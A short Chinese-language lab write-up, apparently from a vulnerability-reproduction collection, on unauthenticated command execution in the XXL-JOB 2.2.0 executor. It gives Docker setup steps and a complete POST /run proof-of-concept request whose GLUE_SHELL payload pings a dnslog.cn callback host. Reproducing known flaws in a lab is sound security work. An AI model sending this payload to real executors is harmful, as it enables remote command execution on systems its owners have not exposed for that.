# XXL-JOB executor 未授权访问漏洞
XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,未授权的攻击者可以通过RESTful API执行任意命令。
## 环境搭建
执行如下命令启动2.2.0版本的XXL-JOB:
docker-compose up -d
环境启动后,访问`http://your-ip:8080`即可查看到管理端(admin),访问`http://your-ip:9999`可以查看到客户端(executor)。
## 漏洞复现
poc
POST /run HTTP/1.1
Host: 10.0.128.46:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 368
{ "jobId": 1, "executorHandler": "demoJobHandler", "executorParams": "demoJobHandler", "executorBlockStrategy": "COVER_EARLY", "executorTimeout": 0, "logId": 1, "logDateTime": 1586629003729, "glueType": "GLUE_SHELL", "glueSource": "ping 0r4t1y.dnslog.cn", "glueUpdatetime": 1586699003758, "broadcastIndex": 0, "broadcastTotal": 0 }
成功